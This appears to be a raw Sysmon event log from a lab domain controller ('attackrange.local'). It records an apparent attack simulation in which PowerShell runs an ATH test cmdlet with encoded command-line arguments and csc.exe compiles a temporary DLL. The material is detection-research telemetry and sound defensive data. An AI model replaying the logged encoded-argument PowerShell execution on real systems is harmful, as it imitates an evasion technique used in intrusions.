Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=47B2EFE1A0B1963D3AB5B07154260C55,SHA256=C28528ABA777E745A7FA705C8B3BB95CF3678067C0862BE979F1EF484E93C96E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.cmdlineMD5=1B165D624106A53C24B34564B8FEE1AB,SHA256=2B9A67B1950DC59B0A8EF92E43439AD61E92FB5FEE4B6AC487FA35B034E5D2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.dllMD5=4486BBF59B7B5570EC7769BE63A792B4,SHA256=3EE980F26DB2E7202A460E72E9DF06595FDC34D8D4EE7BBC297110AB065D546C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000001697801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.0.csMD5=FB718D19F4C91D265609078FD8B12F5B,SHA256=C8612E37CBE1FB289864974C65AE8679D1AD656EAF43D265D3F277D28679692D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7C88-00000000AD01}8052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.outMD5=9259DDDDAA615DC3128437C8A1603713,SHA256=E348FC7C55B31E0DB2CB4B535A68A62A296F955F790EECB815E66D2E308BF364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7D88-00000000AD01}4824ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\CSCF2D18528948D46CEAF2E46DDC46B953F.TMPMD5=D09D342FDF64A73877D4209A9C696DFF,SHA256=CC2ED6B6B9489EA2CE58AD6A335D7F6283867E121652FBE5DEC52E5B19AF2CB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE1D4CC242EFB383544B5A1BCD415B3,SHA256=BCC483C9E38A7E22194A45FEB6A0F9B4C7D65E9D83FA08D77E13D33B961E6717,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.dll2021-03-01 22:55:47.599 23542300x80000000000000001697796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.693{05ADC7E1-70F3-603D-7D88-00000000AD01}4824ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-70F3-603D-7D88-00000000AD01}4824ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES6E5.tmpMD5=80729A9B11C9E149481F754B74B4B152,SHA256=4E1B20C38349CC500A0EF0D6E9BA7747786E685AAFC5ABC36E9533783F7C0B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-70F3-603D-7E88-00000000AD01}3160ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\RES6E5.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F3-603D-7E88-00000000AD01}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7E88-00000000AD01}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.674{05ADC7E1-70F3-603D-7D88-00000000AD01}48247368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{05ADC7E1-70F3-603D-7E88-00000000AD01}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001697786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.676{05ADC7E1-70F3-603D-7E88-00000000AD01}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\2\RES6E5.tmp" "c:\Users\Administrator\AppData\Local\Temp\2\201oidti\CSCF2D18528948D46CEAF2E46DDC46B953F.TMP"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.cmdline" 22542200x80000000000000001697785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.073{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.665{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000001697783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.072{05ADC7E1-70EB-603D-6E88-00000000AD01}6868WIN-DC-9740fe80::6167:9038:1edc:47d4;::ffff:10.0.1.14;C:\Windows\system32\wbem\wmiprvse.exe 10341000x80000000000000001697782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.664{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-70EB-603D-6E88-00000000AD01}6868C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-70F3-603D-7C88-00000000AD01}80525852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+4ea0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\8052f993fc8b33a503daf487ee7faec3\Microsoft.PowerShell.Commands.Utility.ni.dll+4ea0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d8357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64) 154100x80000000000000001697774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.605{05ADC7E1-70F3-603D-7D88-00000000AD01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.cmdline"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop} 11241100x80000000000000001697773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:47.599{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.cmdline2021-03-01 22:55:47.599 11241100x80000000000000001697772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-01 22:55:47.599{05ADC7E1-70F3-603D-7C88-00000000AD01}8052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\201oidti\201oidti.dll2021-03-01 22:55:47.599 